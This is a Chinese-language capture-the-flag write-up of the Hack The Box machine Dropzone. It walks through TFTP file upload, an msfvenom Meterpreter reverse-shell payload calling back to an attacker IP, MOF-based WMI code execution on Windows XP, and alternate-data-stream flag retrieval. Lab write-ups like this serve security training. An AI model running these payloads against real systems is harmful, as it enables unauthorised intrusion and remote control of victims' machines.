导语:今天我们的靶机是Dropzone,同样来自hack the box。hack the box实验室有很多靶机,难度从初级到专业级都有,本次我们的靶机属于专业级。任务是查看user.txt和root.txt文件内容。
今天我们的靶机是Dropzone,同样来自hack the box。hack the box实验室有很多靶机,难度从初级到专业级都有,本次我们的靶机属于专业级。任务是查看user.txt和root.txt文件内容。
靶机Dropzone的IP地址是10.10.10.90.
下面就正式开始对靶机进行渗透。
首先用nmap来扫一下开放的端口和服务,这里使用的参数是-sU,如下所示:
nmap -sU -T4 10.10.10.90
扫描结果如图:
从图中可以看出,靶机开放了69端口,并且运行着TFTP服务。
我们使用tftp客户端连接到目标系统中,意外的发现我们竟然可以上传和下载文件。我们试着下载“boot.ini”文件到本地,然后退出tftp连接,在本地使用cat命令查看一下这个文件,发现目标系统运行的是Windows XP系统,如图所示:
不过我们没有找到对tftp服务进行利用的exp,所以我们打算使用MOF文件WMI利用来获取目标系统的反弹shell。
首先我们使用msfvenom生成一个可执行的木马文件,命令如下:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.4 lport=443 -f exe > hack.exe
如图:
msf中还有一个模块叫“wbemexec.rb”,这个模块可以生成MOF文件(你可以在这里找到该文件),我们下载该文件,并对它进行编辑来运行我们自己的shell代码。修改后的代码,你可以从这里下载,如图所示:
接着我们使用tftp连接上去,然后上传hack.exe和MOF文件,命令如下:
tftp> binary tftp> put hack.exe /WINDOWS/system32/hack.exe tftp> put hack.mof /WINDOWS/system32/wbem/mof/hack.mof
如图:
在上传文件之前,我们先在本地设置一下监听,命令如下:
msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 10.10.14.4 msf exploit(multi/handler) > set lport 443 msf exploit(multi/handler) > run
只要我们上传了MOF文件和payload,并得以执行,我们就可以获得一个反向shell。获得反向shell后,我们来查看一下系统信息,意外的发现,这个shell竟然就是一个administrator账户,查看信息命令:
meterpreter > sysinfo meterpreter > getuid
结果如图:
我们进入到桌面,发现了root.txt文件,不过查看文件内容后,发现flag并不在该文件中,命令如下:
meterpreter > cd Administrator meterpreter > ls meterpreter > cd Desktop meterpreter > ls meterpreter > cat root.txt
如图:
可以看到桌面上还有另外一个目录flags,我们进入到该目录,发现了一个奇怪的文件,文件名是2 for the price of 1!.txt,这个文件给了我们一个提示,就是我们必须使用交换数据流来获取flag,交换数据流是NTFS文件系统的一个属性,这个属性可以用来隐藏数据。
meterpreter > cd flags meterpreter > dir meterpreter > cat "2 for the price of 1!.txt"
我们可以使用sysinternals工具集中的streams.exe文件来检查交换数据流(工具下载地址在这里)
接着,我们将streams.exe上传到目标系统中,然后生成一个shell,然后执行这个可执行文件来查找当前目录中的交换数据流,如此一来,我们就找到了user flag和root flag,命令如下:
meterpreter > upload /root/Downloads/Streams/streams.exe meterpreter > shell streams -accepteula -s .
结果如图:
本次靶机到此结束,谢谢大家!